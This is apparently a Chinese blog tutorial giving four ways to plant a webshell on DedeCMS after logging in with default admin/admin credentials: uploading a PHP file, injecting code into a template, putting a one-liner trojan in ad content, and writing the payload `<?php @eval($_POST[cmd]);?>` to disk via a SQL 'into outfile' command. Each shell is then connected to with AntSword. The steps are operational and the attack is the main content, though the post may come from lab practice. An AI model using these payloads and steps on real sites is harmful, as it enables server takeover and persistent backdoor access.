dedecms(四种webshell姿势)

步骤一,登录网站

步骤二,进入后台

账号密码同为admin

姿势一,通过文件管理器上传WebShell

登陆到后台点击 【核心】--》【文件式管理器】【文件上传】 将准备好的一句话代码上传...OK

1.我们先创建一个1.php上传

2.上传之后我们双击1.php

3.我们进入1.php页面

4.蚁剑连接

姿势二,修改模板文件拿WebShell

与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下

1.我们修改一下index.htm,index.htm修改为php在第一段添加<?php phpinfo();?>点击保存

2.点击 【生成】【更新主页HTML】--》将主页位置修改为【/index.php】--》

点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...

3.访问/dede/../index.php

姿势三,后台任意命令执行拿WebShell

点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

1.添加内容在广告内容添加一句话木马其他的谁便写

2.点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

3.访问/plus/ad_js.php?aid=1

4.蚁剑连接

姿势四,通过sql命令行工具获取webshell

点击【系统】【sql命令行工具】--》多行命令中输入select '<?php @eval($_POST[cmd]);?>' into outfile '+路径+创建文件名

1.输入命令

2.点击确定

3.确认有记录

相关推荐
m0_694845575 分钟前
服务器如何配置防火墙规则开放/关闭端口?
linux·服务器·安全·云计算
mooyuan天天1 小时前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
柴郡猫^O^3 小时前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试
泡泡以安4 小时前
JA3指纹在Web服务器或WAF中集成方案
服务器·安全·https·ja3指纹
Raners_4 小时前
【Linux】文件权限以及特殊权限(SUID、SGID)
linux·安全
速盾cdn5 小时前
速盾:高防CDN还有哪些冷知识?
网络·web安全
格调UI成品6 小时前
预警系统安全体系构建:数据加密、权限分级与误报过滤方案
大数据·运维·网络·数据库·安全·预警
Wallace Zhang8 小时前
STM32F103_Bootloader程序开发11 - 实现 App 安全跳转至 Bootloader
stm32·嵌入式硬件·安全
CertiK9 小时前
IBW 2025: CertiK首席商务官出席,探讨AI与Web3融合带来的安全挑战
人工智能·安全·web3
m0_7381207210 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全